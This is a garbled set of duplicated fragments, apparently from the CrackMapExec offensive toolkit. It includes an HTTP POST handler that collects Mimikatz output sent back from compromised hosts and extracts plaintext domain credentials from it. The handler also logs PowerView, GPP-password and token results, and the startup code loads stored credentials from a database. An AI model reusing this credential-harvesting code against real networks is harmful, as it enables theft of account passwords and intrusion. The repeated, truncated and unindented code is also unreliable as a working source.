def do_POST(self):
self.send_response(200)
self.end_headers()
length = int(self.headers.getheader('content-length'))
data = self.rfile.read(length)
cme_logger = CMEAdapter(logging.getLogger('CME'), {'host': self.client_address[0],
'port': self.client_address[1],
'service': 'PARSER',
'hostname': ''})
if settings.args.mimikatz:
try:
buf = StringIO(data).readlines()
plaintext_creds = []
i = 0
while i < len(buf):
if ('Password' in buf[i]) and ('(null)' not in buf[i]):
passw = buf[i].split(':')[1].strip()
domain = buf[i-1].split(':')[1].strip()
user = buf[i-2].split(':')[1].strip()
plaintext_creds.append('{}\\{}:{}'.format(domain, user, passw))
i += 1
if plaintext_creds:
cme_logger.success('Found plain text credentials (domain\\user:password)')
for cred in plaintext_creds:
cme_logger.results(u'{}'.format(cred))
except Exception as e:
cme_logger.error("Error while parsing Mimikatz output: {}".format(e))
self.save_mimikatz_output(data, cme_logger)
elif settings.args.mimikatz_cmd:
cme_logger.success('Got Mimikatz command output')
cme_logger.results(data)
self.save_mimikatz_output(data)
elif settings.args.powerview and data:
cme_logger.success('Got PowerView command output')
buf = StringIO(data.strip()).readlines()
for line in buf:
cme_logger.results(line.strip())
elif settings.args.gpp_passwords and data:
cme_logger.success('Got Get-GPPPasswords output')
buf = StringIO(data.strip()).readlines()
for line in buf:
cme_logger.results(line.strip())
elif settings.args.tokens and data:
cme_logger.success('Retrieved avalible tokens:')
buf = StringIO(data.strip()).readlines()
for line in buf:
cme_logger.results(line.strip())
def do_POST(self):
self.send_response(200)
self.end_headers()
length = int(self.headers.getheader('content-length'))
data = self.rfile.read(length)
cme_logger = CMEAdapter(logging.getLogger('CME'), {'host': self.client_address[0],
'port': self.client_address[1],
'service': 'PARSER',
'hostname': ''})
if settings.args.mimikatz:
try:
buf = StringIO(data).readlines()
plaintext_creds = []
i = 0
while i < len(buf):
if ('Password' in buf[i]) and ('(null)' not in buf[i]):
passw = buf[i].split(':')[1].strip()
domain = buf[i-1].split(':')[1].strip()
user = buf[i-2].split(':')[1].strip()
plaintext_creds.append('{}\\{}:{}'.format(domain, user, passw))
i += 1
if plaintext_creds:
cme_logger.success('Found plain text credentials (domain\\user:password)')
for cred in plaintext_creds:
cme_logger.results(u'{}'.format(cred))
except Exception as e:
cme_logger.error("Error while parsing Mimikatz output: {}".format(e))
self.save_mimikatz_output(data, cme_logger)
elif settings.args.mimikatz_cmd:
cme_logger.success('Got Mimikatz command output')
cme_logger.results(data)
self.save_mimikatz_output(data)
elif settings.args.powerview and data:
cme_logger.success('Got PowerView command output')
buf = StringIO(data.strip()).readlines()
for line in buf:
cme_logger.results(line.strip())
elif settings.args.gpp_passwords and data:
cme_logger.success('Got Get-GPPPasswords output')
buf = StringIO(data.strip()).readlines()
for line in buf:
cme_logger.results(line.strip())
module = None
server = None
context = None
targets = []
server_port_dict = {'http': 80, 'https': 443}
args = parser.parse_args()
if args.verbose:
setup_debug_logger()
logger = CMEAdapter(setup_logger())
if not os.path.exists('data/cme.db'):
logger.error(
'Could not find CME database, did you run the setup_database.py script?'
)
sys.exit(1)
# set the database connection to autocommit w/ isolation level
db_connection = sqlite3.connect('data/cme.db', check_same_thread=False)
db_connection.text_factory = str
db_connection.isolation_level = None
db = CMEDatabase(db_connection)
if args.cred_id:
try:
c_id, credtype, domain, username, password = db.get_credentials(
filterTerm=args.cred_id)[0]
args.username = [username]
module = None
server = None
context = None
targets = []
server_port_dict = {'http': 80, 'https': 443}
args = parser.parse_args()
if args.verbose:
setup_debug_logger()
logger = CMEAdapter(setup_logger())
if not os.path.exists('data/cme.db'):
logger.error('Could not find CME database, did you run the setup_database.py script?')
sys.exit(1)
# set the database connection to autocommit w/ isolation level
db_connection = sqlite3.connect('data/cme.db', check_same_thread=False)
db_connection.text_factory = str
db_connection.isolation_level = None
db = CMEDatabase(db_connection)
if args.cred_id:
try:
c_id, credtype, domain, username, password = db.get_credentials(filterTerm=args.cred_id)[0]
args.username = [username]
if not args.domain:
args.domain = domain
module = None
server = None
context = None
targets = []
server_port_dict = {'http': 80, 'https': 443}
args = parser.parse_args()
if args.verbose:
setup_debug_logger()
logger = CMEAdapter(setup_logger())
if os.geteuid() is not 0:
logger.error("I'm sorry {}, I'm afraid I can't let you do that".format(getpass.getuser()))
sys.exit(1)
if not args.server_port:
args.server_port = server_port_dict[args.server]
try:
# set the database connection to autocommit w/ isolation level
db_connection = sqlite3.connect('data/cme.db', check_same_thread=False)
db_connection.text_factory = str
db_connection.isolation_level = None
db = CMEDatabase(db_connection)
except Exception as e:
logger.error("Could not connect to CME database: {}".format(e))
sys.exit(1)
module = None
server = None
context = None
targets = []
server_port_dict = {'http': 80, 'https': 443}
args = parser.parse_args()
if args.verbose:
setup_debug_logger()
logger = CMEAdapter(setup_logger())
if os.geteuid() is not 0:
logger.error("I'm sorry {}, I'm afraid I can't let you do that".format(
getpass.getuser()))
sys.exit(1)
if not args.server_port:
args.server_port = server_port_dict[args.server]
try:
# set the database connection to autocommit w/ isolation level
db_connection = sqlite3.connect('data/cme.db', check_same_thread=False)
db_connection.text_factory = str
db_connection.isolation_level = None
db = CMEDatabase(db_connection)
except Exception as e:
logger.error("Could not connect to CME database: {}".format(e))
sys.exit(1)